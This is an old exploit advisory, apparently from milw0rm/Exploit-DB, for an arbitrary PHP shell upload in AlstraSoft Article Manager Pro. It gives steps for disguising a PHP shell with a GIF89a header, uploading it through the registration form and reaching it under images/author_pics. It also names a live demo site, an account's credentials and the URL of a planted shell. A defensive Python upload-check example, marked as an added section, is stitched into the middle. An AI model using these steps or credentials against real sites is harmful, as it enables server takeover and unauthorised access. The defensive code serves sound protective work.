Alstrasoft Article Manager Pro - Arbitrary File Upload

EDB-ID: 8855
CVE: N/A
Author: ZoRLu
Type: webapps
Platform: PHP
Date: 2009-06-02

[~] AlstraSoft Article Manager Pro Remote Shell Upload Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Author: ZoRLu
[~]
[~] Date: 02.06.2009
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~] 
[~] N0T: KPSS ananI ...
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

Add this header to the top of your shell:

Example:

GIF89a;
<?

...
...
...

?>

Save it as shell.php.

Then go here:

yildirimordulari.com/article/register.php

Then select your shell.php.

Finish registering, then log in to the site and edit your profile,

and you will see your shell's name:

yildirimordulari.com/article/images/author_pics/[id].php

example demo:

http://www.blizsoft.com/article/register.php

user: salla

pass: 123a123

shell:

http://www.blizsoft.com/article/images/author_pics/41.php
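
An upload-side check for the file described above, as an added example that is not part of the original advisory or the vendor's code. The page does not say how the application validates the picture, so the allowlist, function names and sample bytes here are assumptions; the point is that a GIF89a magic string alone proves nothing and the extension must come from an allowlist.

```python
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png"}  # assumed avatar policy, not from the page

def _skip_sub_blocks(data, pos):
    """Step over GIF data sub-blocks; return the index after the 0x00 terminator."""
    while data[pos]:  # IndexError on truncated input is caught by the caller
        pos += data[pos] + 1
    return pos + 1

def is_well_formed_gif(data):
    """Walk the GIF block structure to the 0x3B trailer instead of trusting the magic."""
    try:
        if data[:6] not in (b"GIF87a", b"GIF89a"):
            return False
        packed = data[10]  # logical screen descriptor flags
        pos = 13 + (3 * (2 << (packed & 0x07)) if packed & 0x80 else 0)
        images = 0
        while True:
            block = data[pos]
            if block == 0x3B:  # trailer: valid only if at least one image was seen
                return images > 0
            if block == 0x21:  # extension: introducer, label, then sub-blocks
                pos = _skip_sub_blocks(data, pos + 2)
            elif block == 0x2C:  # image descriptor (10 bytes), optional local table
                lpacked = data[pos + 9]
                pos += 10 + (3 * (2 << (lpacked & 0x07)) if lpacked & 0x80 else 0)
                pos = _skip_sub_blocks(data, pos + 1)  # +1 skips LZW min code size
                images += 1
            else:
                return False
    except IndexError:
        return False

def review_upload(filename, data):
    """Return the reasons to reject an avatar upload; an empty list means accept."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    reasons = []
    if ext not in ALLOWED_EXT:
        reasons.append("extension not allowlisted: %r" % ext)
    if b"<?" in data:  # heuristic; can also match by chance in large binary images
        reasons.append("PHP open tag in body")
    if data[:3] == b"GIF" and not is_well_formed_gif(data):
        reasons.append("GIF magic present but block structure invalid")
    return reasons

# Constructed samples: a 1x1 GIF, and the header trick with an inert placeholder body.
VALID_GIF = bytes.fromhex("47494638396101000100800000ffffff000000"
                          "21f90401000000002c00000000010001000002024401003b")
FAKE_GIF = b"GIF89a;\n<?\n// constructed placeholder, no payload\n?>\n"
```

A file that is a valid GIF and also carries script text in a comment block passes the structure walk, so the extension allowlist, a server-chosen filename and an upload directory the web server will not execute remain the controls that matter.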


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX  and all friends
[~]
[~] yildirimordulari.com / dafgamers.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-02]